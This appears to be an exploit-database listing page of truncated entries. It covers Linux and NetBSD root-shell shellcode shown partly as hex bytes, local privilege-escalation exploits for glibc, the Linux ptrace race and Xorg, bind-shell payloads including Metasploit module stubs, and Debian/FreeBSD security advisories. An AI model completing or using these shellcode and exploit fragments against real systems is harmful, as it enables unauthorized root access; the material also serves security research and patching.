linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes

No description provided by source. / Linux/x86 setreuid0,0 + execve/bin/sh, /bin/sh, NULL - 33 bytes - [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \x31\xc9 // xor %ecx, %ecx \xcd\x80 // int $0x80 \x31\xd2 // xor %edx, %edx \x6a\x0b // pus...

Local Glibc shared library (.so) <= 2.11.1 exploit

No description provided by source. Exploit Title: Local Glibc shared library .so exploit Date: 07.04.10 Author: Rh0 [email protected] Software Link: NA Version: = 2.11.1, higher not tested Tested on: Debian stable x86-64, Ubunutu 9.10 x86, Fedora 12 x86 CVE : NA Code : !/bin/sh A lot of applications in...

Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (ppc)

No description provided by source. !/usr/bin/perl http://www.digitalmunition.com/FailureToLaunch-ppc.pl Code by Kevin Finisterre kflistsatdigitalmunitiondotcom Much appreciation goes to John H for all kindsa random shit like exploiting Veritas and other random things in the past core... where the...

97 bytes Linx x86 bind shell port 64533

No description provided by source. include stdio.h include string.h / 1 1 0 I'm Magnefikko member from Inj3ct0r Team & Promhyl Studies Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 by Magnefikko 05.07.2010 [email protected] Promhyl Studies ::...

linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 23 bytes

No description provided by source. / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security [email protected] Linux/x86 execve/bin/sh, /bin/sh, NULL / char shellcode = \x6a\x0b // push $0xb \x58 // pop %eax \x99 // cltd \x52 // push %edx \x68\x2f\x2f\x73\x68 // push $0x68732f2f...

MTools 3.9.x MFormat Privilege Escalation Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/9746/info It has been reported that mformat is prone to a privilege escalation vulnerability when installed as a setUID application. This issue is due to a design error allowing a user to create any arbitrary files as the...

Linux kernel <= 2.2.18 ptrace/execve Race Condition Vulnerability (2)

No description provided by source. source: http://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers. A problem in the Linux Kernel could...

linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34 bytes

No description provided by source. / linux/x86 setreuidgeteuid,geteuid,execve/bin/sh,0,0 34byte universal shellcode blue9057 [email protected] / int main char shellcode=\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46 \x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68...

netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 30 bytes

No description provided by source. / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve/bin//sh, ..., NULL; / include sys/types.h include stdio.h include string.h char scode = \x31\xc0 // xor %eax,%eax \x50 // push %eax \x50 // push %eax \x50 // push %eax \x34\x7e // xo...

Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit

No description provided by source. / GNU/Linux kernel 2.6.29 ptraceattach local root race condition exploit. ========================================================================== This is a local root exploit for the 2.6.29 ptraceattach race condition that allows a process to gain elevated...

linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes

No description provided by source. / linux/x86 setreuid0, 0 + execve/bin/sh, /bin/sh, NULL, NULL - 31 bytes - izik [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx,%ebx \x31\xc9 // xor %ecx,%ecx \xcd\x80 // int $0x80 \x99 // cltd \xb0\x0b // mov...

Xorg 1.4 to 1.11.2 File Permission Change PoC

No description provided by source. / xchmod.c -- Xorg file permission change vulnerability PoC Author: vladz http://vladz.devzero.fr Date: 2011/12/15 Software: www.x.org Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and earlier if built with the USECHMOD preprocessor identifier Test...

CVE-2014-3880

CVE-2014-3880 affects the FreeBSD kernel: executing a new image can destroy the calling process’s virtual memory space before all threads terminate, dereferencing an invalid page table pointer and triggering a triple fault leading to a reboot. Affected: FreeBSD 8.4 (before p11), 9.1 (before p14),...

Debian DSA-2952-1 : kfreebsd-9 - security update

Several vulnerabilities have been discovered in the FreeBSD kernel that may lead to a denial of service or possibly disclosure of kernel memory. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2014-1453 A remote, authenticated attacker could cause the NF...

Debian Security Advisory DSA 2952-1 (kfreebsd-9 - security update)

Several vulnerabilities have been discovered in the FreeBSD kernel that may lead to a denial of service or possibly disclosure of kernel memory. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2014-1453 A remote, authenticated attacker could cause the NFS...

DSA-2952-1 kfreebsd-9 - security update

Bulletin has no description...

Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)

Linux/x86 - setreuid + execve/usr/bin/python Shellcode 54 bytes. Shellcode exploit for Linuxx86 platform Title: Shellcode Linux x86 54Bytes Run /usr/bin/python | setreuid,execve Date: 8/5/2014 Author: Ali Razmjoo Tested on: kali-linux-1.0.4-i386 3.7-trunk-686-pae 1 SMP Debian 3.7.2-0+kali8 i686...

Linux Kernel (Ubuntu 11.1012.04) - binfmt_script Stack Data Disclosure

Linux Kernel Ubuntu 11.1012.04 - binfmtscript Stack Data Disclosure Source: http://www.halfdog.net/Security/2012/LinuxKernelBinfmtScriptStackDataDisclosure/ Introduction Problem description: Linux kernel binfmtscript handling in combination with CONFIGMODULES can lead to disclosure of kernel stac...

Linux Command Shell, Bind TCP Random Port Inline

Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 51...

Linux Command Shell, Bind TCP Random Port Inline

Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 57...